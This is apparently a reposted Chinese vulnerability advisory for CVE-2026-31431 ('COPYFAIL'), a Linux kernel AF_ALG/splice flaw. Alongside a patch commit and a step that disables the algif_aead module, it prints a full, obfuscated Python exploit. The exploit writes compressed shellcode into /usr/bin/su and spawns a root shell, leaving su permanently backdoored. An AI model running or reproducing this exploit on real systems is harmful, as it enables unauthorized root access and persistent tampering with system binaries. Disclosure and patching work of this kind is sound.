文章总结: CVE-2026-31431(COPYFAIL漏洞)利用Linux内核AFALG接口与splice系统调用的内存处理缺陷,通过篡改/usr/bin/su文件直接获取root权限,影响2017年后未打补丁的主流Linux内核。复现时需备份su文件,EXP脚本含恶意shellcode仅限验证用途。修复方案包括更新含a664bf3d603d提交的内核或禁用algifaead模块。 综合评分: 85 文章分类: 漏洞分析,应急响应,漏洞预警
复现注意事项:
如果你尝试了一次exp,你就会发现,就算你不再运行脚本,你直接运行su也会直接提权到root,这是因为exp会往su写入恶意shellcode,导致su被篡改。
在复现之前建议先copy一份su
sudo cp /usr/bin/su /usr/bin/su.bak
在复现完成后恢复文件
sudo mv /usr/bin/su.bak /usr/bin/su
EXP
本EXP仅做漏洞验证使用,请勿用于非法用途!
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
修复建议
及时打补丁:更新内核到包含 a664bf3d603d 提交的版本
临时修补方案:
直接禁用algif_aead 模块:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
再运行EXP就会失败
参考链接:https://copy.fail
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:YaYaLiou网安 《[高危漏洞通报]COPY FAIL漏洞(CVE-2026-31431)复现及修复建议》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
![[高危漏洞通报]COPYFAIL漏洞(CVE-2026-31431)复现及修复建议](/images/random/titlepic/13.jpg)
评论